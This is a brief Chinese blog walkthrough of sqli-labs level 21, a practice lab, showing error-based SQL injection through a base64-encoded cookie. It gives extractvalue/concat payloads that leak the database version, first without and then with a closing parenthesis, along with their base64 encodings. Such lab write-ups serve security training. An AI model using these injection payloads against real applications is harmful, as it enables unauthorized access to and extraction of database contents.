sqli labs-21

1、与sqli-20一样,但是它对cookie进行了base64加密处理。所以第一个想到的就是直接对报错注入语句进行base 64加密在提交,。admin1′ and extractvalue(1,concat(0x7e,(select @@version),0x7e))# 加密后 YWRtaW4xJyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQHZlcnNpb24pLDB4N2UpKSM= 发现其会报错。。

2、原来是要括号啊。采用 admin1′) and extractvalue(1,concat(0x7e,(select @@version),0x7e))# 进行base64加密 YWRtaW4xJykgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgQEB2ZXJzaW9uKSwweDdlKSkj 再次发送修改cookie后的请求,发现成功爆出数据库版本。

发表评论

电子邮件地址不会被公开。 必填项已用*标注